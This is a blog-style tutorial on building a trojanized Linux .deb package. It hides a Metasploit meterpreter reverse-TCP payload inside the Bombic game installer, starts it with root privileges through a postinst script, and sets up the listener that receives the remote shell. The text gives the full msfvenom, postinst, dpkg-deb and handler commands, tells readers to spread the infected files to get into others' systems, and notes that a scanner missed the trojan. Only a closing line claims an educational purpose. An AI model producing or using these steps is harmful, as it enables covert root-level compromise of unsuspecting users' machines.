Metasploit: Linux Session If you have been reading the previous articles, you may be wondering how to access a system and gain control of it. In this article, I will cover the process of gaining access to a Linux system. The article will not use a conventional exploit of gaining access to the target system. Since most exploits are already discovered, the holes are patched. In this example I am using a Linux Mint system, but any Linux OS would work, Debian or otherwise. A distro from any Linux Family should do fine as long as you can make an installer file, such as “.deb”, “.rpm”, etc. In this article, we will assume the system is x86 (32-bit), but I will show specifics for 64-bit systems. Basically, the process is to create a Trojan which will be placed onto a target system. When the Trojan is opened, a connection is made back to the Local Host (LHOST) to allow for a Meterpreter session to be opened. Once opened, the user at the LHOST can perform many tasks on the Remote Host (RHOST). The main thing that needs to be done is to find a program that can be used to carry the Trojan. In my example, I will use a program called Bombic (I am using this game for the main purpose that it does not exist in the package manager). If the program is in Package Manager it will inform the user it exists in the Package Manager and should be downloaded from there. If this happens, the user may use the Package Manager instead and the Trojan will not be used. The Bombic game is made up of two files: bombic_0.0.1-1~getdeb2_i386.deb bombic-data_0.0.1-1~getdeb2_all.deb The “bombic-data” file is the first file to install since it contains the dependencies for the main installer, “bombic”. It is the “bombic” file in which the Trojan will be placed. So, the next step is to get the information for the Trojan. To make the Trojan, the LHOST IP Address and the Port on the LHOST (LPORT) need to be set. Keep in mind that the Port should be above the 1024 of the common Port numbers used. I will use Port 1443 as my Port to listen to from Metasploit. My LHOST IP Address of my Metasploit system is 10.0.0.2. The next step is to open the “bombic” file. Since it is a “.deb” file, it is really a “.tar.gz” file and can be opened with an archive program such as “Archive Manager”. Once opened, there are two folders: “DEBIAN” and “usr”. Create a folder, “/tmp/bombic/” and place the two folders from the “.deb” into the folder. Open the folder named “DEBIAN”. There should be two files listed here: control and md5sums. Do not make any changes to either of these files. It is now time to create the Trojan which will deliver the payload. Open the DEBIAN folder in a terminal. Once the terminal is open, enter the following command: msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=1443 -b "\x00" -f elf -o /tmp/bombic/usr/games/hi_score-k NOTE: For 64-bit systems, you could change the “x86” to “x64”. The 32-bit version should work fine on a 64-bit system. The LHOST IP Address will be changed to your address and the LPORT can be what you want. Do remember the LPORT number since this will be used later. After some time, usually a short amount, you should get some output and then a line saying “Saved as: /tmp/bombic/usr/games/hi_score”. The file should be saved as noted, but you can set the name to whatever you may require. The file should be named something that makes it appear that it belongs in the installation file. Now that the Trojan exists, we need to make sure it is executed so it can contact the LHOST system on the Port set by LPORT. To do this, we need to set up a file called “postinst”. The file does not exist for this installation, but some installations do have it. The “postinst” is executed after the installation is completed. If the “postinst” file exists, you need to insert part the command after the BASH Header line. If you are creating the file, then insert both lines. The lines are: #!/bin/sh sudo chmod 2755 /usr/games/hi_score && /usr/games/hi_score & /usr/games/bombic Notice that the Trojan file is having its permissions changed and then it is executed. The main program is also being started as well. Starting the game here is an optional choice, but the Trojan must be started here. The reason to start the Trojan from the installer is that when installing, the program has root privileges. Since the installer has root privileges, the Trojan will too. When you connect to the Trojan process, you will have the same privileges as well on the target system. The permissions need to be changed for the “postinst” file by running the command in the DEBIAN folder from a terminal: “chmod 755 postinst”. The permissions allow the file to be executed by any user of the system. Everything should be done now except the new “.deb” file needs to be created. To create the Debian installation file, use the command “dpkg-deb --build /tmp/bombic”. There should be a “bombic.deb” file which can be renamed to match the original file. Get the infected files out to others so you can start getting into their systems. NOTE: The game on some systems may require the dependency “libsdl-ttf2.0-0” which can be downloaded from the Debian Package Manager. To start listening on the LHOST with Metasploit start your Metasploit services: “sudo service metasploit start” if they are not set to autostart. Start the “msfconsole”. At the “msf >” prompt, type the following command: “use exploit/multi/handler”. Once it is loaded, the payload needs to be loaded by the command “set PAYLOAD linux/x86/meterpreter/reverse_tcp”. Type “show options” to see what is required. You only need to set the LHOST and LPORT. From what was set before, my settings would be: set LHOST 10.0.0.2 set LPORT 1443 Once these items are set, type “exploit” and press “ENTER”. Now you need to wait for the target system to install the application. Once the application starts to install, the Trojan will be started which opens Port 1443 and signals the LHOST at IP Address 10.0.0.2. Once the “meterpreter >” prompt is shown you can enter “?” at the prompt to have the available commands shown. Remember, this article is to help Administrators and users learn how Trojans can get onto a company network or a single system. NOTE: To really scare administrators to this threat, I ran the Trojan through a Linux virus-scanner and the Trojan was not detected.